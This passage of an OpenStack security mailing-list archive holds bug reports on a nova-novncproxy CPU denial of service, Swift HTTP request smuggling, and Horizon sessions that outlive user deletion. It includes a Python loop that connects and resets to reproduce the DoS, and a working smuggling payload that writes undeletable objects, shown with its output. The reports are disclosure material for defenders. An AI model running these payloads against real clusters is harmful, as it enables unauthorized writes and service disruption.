"nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.382 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.002s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.393 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.395 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.003s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.437 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.443 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 
2019-02-19 15:02:45.451 2889 INFO nova.compute.rpcapi [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Automatically selected compute RPC version 5.0 from minimum service version 35 2019-02-19 15:02:45.452 2889 INFO nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] handler exception: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 DEBUG nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] exception vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy Traceback (most recent call last): 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 928, in top_new_client 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy client = self.do_handshake(startsock, address) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 858, in do_handshake 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.RequestHandlerClass(retsock, address, self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/nova/console/websocketproxy.py", line 311, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy websockify.ProxyRequestHandler.__init__(self, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 113, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.__init__(self, req, addr, server) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/SocketServer.py", line 652, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 579, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.handle(self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 340, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle_one_request() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 310, in handle_one_request 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.raw_requestline = self.rfile.readline(65537) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/socket.py", line 480, in readline 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy data = self._sock.recv(self._rbufsize) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 190, in recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return self._base_recv(buflen, flags, into=False) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 217, in _base_recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy read = self.read(nbytes) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 135, in read 2019-02-19 15:02:45.452 
2889 ERROR nova.console.websocketproxy super(GreenSSLSocket, self).read, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 109, in _call_trampolining 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return func(*a, **kw) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/ssl.py", line 673, in read 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy v = self._sslobj.read(len) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy error: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy 2019-02-19 15:02:47.037 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873

(paste: http://paste.openstack.org/show/745451/)

This sequence starting with the "new handler Process" repeats continuously. It seems that the haproxy health checks initiate an SSL connection but then immediately send a TCP RST: http://git.haproxy.org/?p=haproxy.git;a=commit;h=fd29cc537b8511db6e256529ded625c8e7f856d0

For most services this does not seem to be an issue, but for nova-novncproxy it repeatedly initializes NovaProxyRequestHandler which creates a full nova.compute.rpcapi.ComputeAPI instance which very quickly starts to consume significant CPU and overtake the host. Note that we tried upgrading to HEAD of websockify and eventlet which did not improve the issue.

Our workaround was to turn off check-ssl in haproxy and use a basic tcp check, but we're concerned that nova-novncproxy remains vulnerable to a DOS attack given how easy it is for haproxy to overload the service. For that reason I'm opening this initially as a security bug, though you could perhaps argue that it's no secret that making un-ratelimited requests at any service will cause high load.

Steps to reproduce
==================
1. Configure nova-novncproxy to use SSL by setting the cert= and key= parameters in [DEFAULT] and turn on debug logging.
2. You can simulate the haproxy SSL health check with this python script:

    import socket, ssl, struct, time
    host = '192.168.237.81'
    port = 5554
    while True:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ssl_sock = ssl.wrap_socket(sock)
        ssl_sock.connect((host, port))
        ssl_sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
        sock.close()
        time.sleep(2)

Expected result
===============
nova-novncproxy should gracefully handle the RST and not start overutilizing CPU. It should probably hold off on initializing database connections and such until a meaningful request other than an SSL HELLO is received.

Actual result
=============
The nova-novncproxy process quickly jumps to the top of the CPU% metrics of process analyzers like top and htop and if left unattended on a server with few cores will cause the server's overall performance to be degraded.
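(Editor's note: the "Expected result" above asks for two behaviors, tolerating an early reset and deferring expensive per-connection setup. A minimal Python 3 sketch of that idea follows; it is not the actual nova fix, and build_compute_rpcapi() is a hypothetical placeholder for the heavyweight nova.compute.rpcapi.ComputeAPI initialization.)

    # Editorial sketch: treat a probe that connects and immediately resets
    # as routine, and pay the expensive setup cost only once a request
    # line has actually been read from the socket.
    def build_compute_rpcapi():
        """Hypothetical stand-in for the costly RPC/DB client construction."""
        return object()

    def handle_connection(conn):
        rfile = conn.makefile('rb')
        try:
            request_line = rfile.readline(65537)
        except (ConnectionResetError, BrokenPipeError):
            # An haproxy-style SSL probe that sends RST right after the
            # handshake lands here; return quietly instead of treating it
            # as a handler crash or doing any per-connection setup.
            return None
        if not request_line:
            return None  # peer closed without sending a meaningful request
        rpcapi = build_compute_rpcapi()  # only now pay the expensive cost
        return rpcapi, request_line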
Environment =========== We found this on the latest of the stable/rocky branch on SLES: # cat /etc/os-release NAME="SLES" VERSION="12-SP4" VERSION_ID="12.4" PRETTY_NAME="SUSE Linux Enterprise Server 12 SP4" # uname -a Linux d52-54-77-77-01-01 4.12.14-95.6-default #1 SMP Thu Jan 17 06:04:39 UTC 2019 (6af4ef8) x86_64 x86_64 x86_64 GNU/Linux # zypper info openstack-nova Information for package openstack-nova: --------------------------------------- Repository : Cloud Name : openstack-nova Version : 18.1.1~dev47-749.1 Arch : noarch Vendor : obs://build.suse.de/Devel:Cloud Support Level : Level 3 Installed Size : 444.7 KiB Installed : Yes Status : up-to-date Source package : openstack-nova-18.1.1~dev47-749.1.src Summary : OpenStack Compute (Nova) # zypper info haproxy Information for package haproxy: -------------------------------- Repository : Cloud Name : haproxy Version : 1.6.11-10.2 Arch : x86_64 Vendor : SUSE LLC Support Level : Level 3 Installed Size : 3.1 MiB Installed : Yes Status : up-to-date Source package : haproxy-1.6.11-10.2.src To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1816727/+subscriptions From 1840507 at bugs.launchpad.net Fri Sep 27 23:01:05 2019 From: 1840507 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 27 Sep 2019 23:01:05 -0000 Subject: [Openstack-security] [Bug 1840507] Related fix merged to swift (master) References: <156599088351.26410.7391620144910796824.malonedeb@gac.canonical.com> Message-ID: <156962526597.2093.2948243972769406380.malone@soybean.canonical.com> Reviewed: https://review.opendev.org/682173 Committed: https://git.openstack.org/cgit/openstack/swift/commit/?id=291873e784aeac30c2adcaaaca6ab43c2393b289 Submitter: Zuul Branch: master commit 291873e784aeac30c2adcaaaca6ab43c2393b289 Author: Tim Burke Date: Thu Aug 15 14:33:06 2019 -0700 proxy: Don't trust Content-Length for chunked transfers Previously we'd - complain that a client disconnected even though they finished their chunked transfer just fine, and - on EC, send a X-Backend-Obj-Content-Length for pre-allocation even though Content-Length doesn't determine request body size. Change-Id: Ia80e595f713695cbb41dab575963f2cb9bebfa09 Related-Bug: 1840507 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840507 Title: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): New Bug description: Python 3 doesn't parse headers the same way as python 2 [1]. We attempt to address this failing [2], but since we're doing it at the application level, eventlet can still get confused about what should and should not be the request body. 
Consider a client request like   PUT /v1/AUTH_test/c/o HTTP/1.1   Host: saio:8080   Content-Length: 4   Connection: close   X-Object-Meta-x-🌴: 👍   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Transfer-Encoding: chunked   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 A python 2 proxy-server will auth the user, add a bunch more headers, and send a request on to the object-servers like   PUT /sdb1/312/AUTH_test/c/o HTTP/1.1   Accept-Encoding: identity   Expect: 100-continue   X-Container-Device: sdb2   Content-Length: 4   X-Object-Meta-X-🌴: 👍   Connection: close   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Content-Type: application/octet-stream   X-Backend-Storage-Policy-Index: 1   X-Timestamp: 1565985475.83685   X-Container-Host: 127.0.0.1:6021   X-Container-Partition: 61   Host: saio:8080   User-Agent: proxy-server 3752   Referer: PUT http://saio:8080/v1/AUTH_test/c/o   Transfer-Encoding: chunked   X-Trans-Id: txef407697a8c1416c9cf2d-005d570ac3   X-Backend-Clean-Expiring-Object-Queue: f (Note that the exact order of the headers will vary but is significant; the above was obtained on my machine with PYTHONHASHSEED=1.) On a python 3 object-server, eventlet will only have seen the headers up to (and not including, though that doesn't really matter) the palm tree. Significantly, it sees `Content-Length: 4` (which, per the spec [3], the proxy-server ignored) and doesn't see either of `Connection: close` or `Transfer-Encoding: chunked`. The *application* gets all of the headers, though, so it responds   HTTP/1.1 100 Continue and the proxy sends the body:   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 Since eventlet thinks the request body is only four bytes, swift writes down b'aa\r\n' for AUTH_test/c/o. Since eventlet didn't see the `Connection: close` header, it looks for and processes more requests on the socket, and swift writes a second object:   $ swift-object-info /srv/node1/sdb1/objects-1/0/*/*/9999999999.99999_ffffffffffffffff.data   Path: /DUDE_u/r/pwned     Account: DUDE_u     Container: r     Object: pwned     Object hash: b05097e51f8700a3f5a29d93eb2941f2   Content-Type: text/evil   Timestamp: 2286-11-20T17:46:39.999990 (9999999999.99999_ffffffffffffffff)   System Metadata:     No metadata found   Transient System Metadata:     No metadata found   User Metadata:     No metadata found   Other Metadata:     No metadata found   ETag: 4034a346ccee15292d823416f7510a2f (valid)   Content-Length: 4 (valid)   Partition 705   Hash b05097e51f8700a3f5a29d93eb2941f2   ... There are a few things worth noting at this point: 1. This was for a replicated policy with encryption not enabled.    Having encryption enabled would mitigate this as the attack    payload would be encrypted; using an erasure-coded policy would    complicate the attack, but I believe most EC schemes would still    be vulnerable. 2. An attacker would need to know (or be able to guess) a device    name (such as "sdb1" above) used by one of the backend nodes. 3. Swift doesn't know how to delete this data -- the X-Timestamp    used was the maximum valid value, so no tombstone can be    written over it [4]. 4. The account and container may not actually exist; it doesn't    really matter as no container update is sent. 
As a result, the    data written cannot easily be found or tracked. 5. A small payload was used for the demonstration, but it should    be fairly trivial to craft a larger one; this has potential as    a DOS attack on a cluster by filling its disks. The fix should involve at least things: First, after re-parsing headers, servers should make appropriate adjustments to environ['wsgi.input'] to ensure that it has all relevant information about the request body. Second, the proxy should not include a Content-Length header when sending a chunk-encoded request to the backend. [1] https://bugs.python.org/issue37093 [2] https://github.com/openstack/swift/commit/76fde8926 [3] https://tools.ietf.org/html/rfc7230#section-3.3.3 item 3 [4] https://github.com/openstack/swift/commit/f581fccf7 To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1840507/+subscriptions From 1842930 at bugs.launchpad.net Mon Sep 30 12:59:11 2019 From: 1842930 at bugs.launchpad.net (Akihiro Motoki) Date: Mon, 30 Sep 2019 12:59:11 -0000 Subject: [Openstack-security] [Bug 1842930] Re: Deleted user still can delete volumes in Horizon References: <156769210930.16602.2940021268217423738.malonedeb@gac.canonical.com> Message-ID: <156984835188.15756.17012402024348340059.malone@chaenomeles.canonical.com> Changing horizon priority to Medium (as the priority in keystone is medium and there is no reason to use higher priority in horizon). ** Changed in: horizon Importance: High => Medium -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842930 Title: Deleted user still can delete volumes in Horizon Status in OpenStack Dashboard (Horizon): Confirmed Status in OpenStack Identity (keystone): Invalid Status in keystonemiddleware: Triaged Status in OpenStack Security Advisory: Won't Fix Bug description: ==Problem== User session in a second browser is not terminated after deleting this user by admin from another browser. User is still able to manage some objects (delete volumes, for example) in a project after being deleted by admin. ==Steps to reproduce== Install OpenStack following official docs for Stein. Login as admin to (Horizon) in one browser. Create a user with role 'member' and assign it to a project. Open another browser and login as created user. As admin user delete created user from "first" browser. Switch to the "second" browser and try to browse through different sections in the dashboard as deleted user -> instances are not shown, but deleted user can list images, volumes, networks. Also this deleted user can delete a volume. ==Expected result== User session in current browser is closed after user is deleted in another browser. I tried this in Newton release and it works as expected (for a short time before session is ended, this deleted user can't list object in instances,volumes). ==Environment== OpenStack Stein rpm -qa | grep -i stein centos-release-openstack-stein-1-1.el7.centos.noarch cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core)  rpm -qa | grep -i horizon python2-django-horizon-15.1.0-1.el7.noarch rpm -qa | grep -i dashboard openstack-dashboard-15.1.0-1.el7.noarch openstack-dashboard-theme-15.1.0-1.el7.noarch To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1842930/+subscriptions
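(Editor's note: for Bug 1842930 above, the keystonemiddleware side of the problem comes down to how long a previously validated token is served from cache. As a hedged example only -- token_cache_time and memcached_servers are auth_token options in recent keystonemiddleware releases, but availability and defaults should be verified against the deployed version, and the values shown are illustrative -- an operator can narrow the window in each service's configuration:)

    [keystone_authtoken]
    # How long (in seconds) a validated token may be reused from cache before
    # keystone is consulted again; a lower value shrinks the period during
    # which a deleted user's token keeps working.
    token_cache_time = 60
    memcached_servers = 127.0.0.1:11211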